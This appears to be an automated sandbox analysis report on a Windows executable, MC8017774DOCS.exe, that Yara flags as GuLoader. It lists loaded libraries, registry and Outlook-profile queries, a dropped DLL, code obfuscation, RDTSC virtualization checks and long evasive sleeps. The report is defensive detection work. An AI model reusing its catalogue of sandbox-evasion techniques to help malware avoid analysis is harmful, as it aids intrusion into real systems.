Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Contains functionality to dynamically determine API calls

Source: MC8017774DOCS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 7084, type: MEMORYSTR

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B2FD0 push eax; ret

0_2_6E9B2FFE

Drops PE files

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API/Special instruction interceptor: Address: 38283BF
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API/Special instruction interceptor: Address: 21F83BF

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	RDTSC instruction interceptor: First address: 37BE195 second address: 37BE195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CC73E051h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	RDTSC instruction interceptor: First address: 218E195 second address: 218E195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CD2809B1h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33B50000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598389	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595105	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594946	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594842	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594406	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Window / User API: threadDelayed 7749			Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Window / User API: threadDelayed 2093			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096	Thread sleep count: 7749 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096	Thread sleep count: 2093 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595469s >= -30000s	Jump to behavior
